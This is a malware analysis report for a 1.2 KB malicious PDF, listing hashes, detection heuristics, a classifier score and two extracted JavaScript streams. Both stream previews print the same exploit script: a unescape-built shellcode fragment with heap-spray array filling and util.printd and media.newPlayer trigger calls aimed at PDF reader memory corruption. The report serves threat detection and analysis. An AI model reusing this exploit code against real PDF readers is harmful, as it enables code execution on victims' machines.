Malicious PDF — malware analysis report

Static analysis result for SHA-256 df6aa5c4a8cb677a…

MALICIOUS

PDF

1.2 KB First seen: 2026-05-10
MD5: 693951b9e1ae7010241dd87e508672f7 SHA-1: b21e8f9d3bdedbedd3520478df9e4cdb56b4024c SHA-256: df6aa5c4a8cb677a4a651746f4c739bb6dae6eb86035fecd3c1b0aaededa58ca
168 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal in the static triage. The document body contains fragments of what appears to be JavaScript code, including string concatenation and date object manipulation, further supporting the presence of obfuscated script. The primary function of the script appears to be to download and execute a second-stage payload, though the exact URL is not directly extractable due to obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var Wo1 = ['54','EB','75','8B','8B','3C'];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x167 578 bytes
SHA-256: 87d95066ee043b694f9047cf9d32dc572ecd506f6daac5ea3d1d0b8a9049a520
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Wo1 = ['54','EB','75','8B','8B','3C'];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0x18A 802 bytes
SHA-256: 8d8d96f3854c7c075a986090c439642532203f0b1e556c27525e400c13d5ce72
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Wo1 = ['54','EB','75','8B','8B','3C'];
var Wo0=""; for(i=0;i<Wo1.length;){Wo0=Wo0+'%u'+Wo1[i]+Wo1[i+1]; i=i+2;} var Wo = unescape(Wo0); var yR = unescape('%u3727%u27f5');

for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);

memory=new Array();

for(i=0;i<0x2000;) {
	memory[i]= yR + Wo; i ++;
}

util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());

endstream 
endobj xref
0 7
0000000000 65535 f 
0000000015 00000 n 
0000000100 00000 n 
0000000297 00000 n 
0000000148 00000 n 
0000000207 00000 n 
0000000359 00000 n 
trailer

<<
/Root 1 0 R
/Size 7
>>
startxref
2491
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.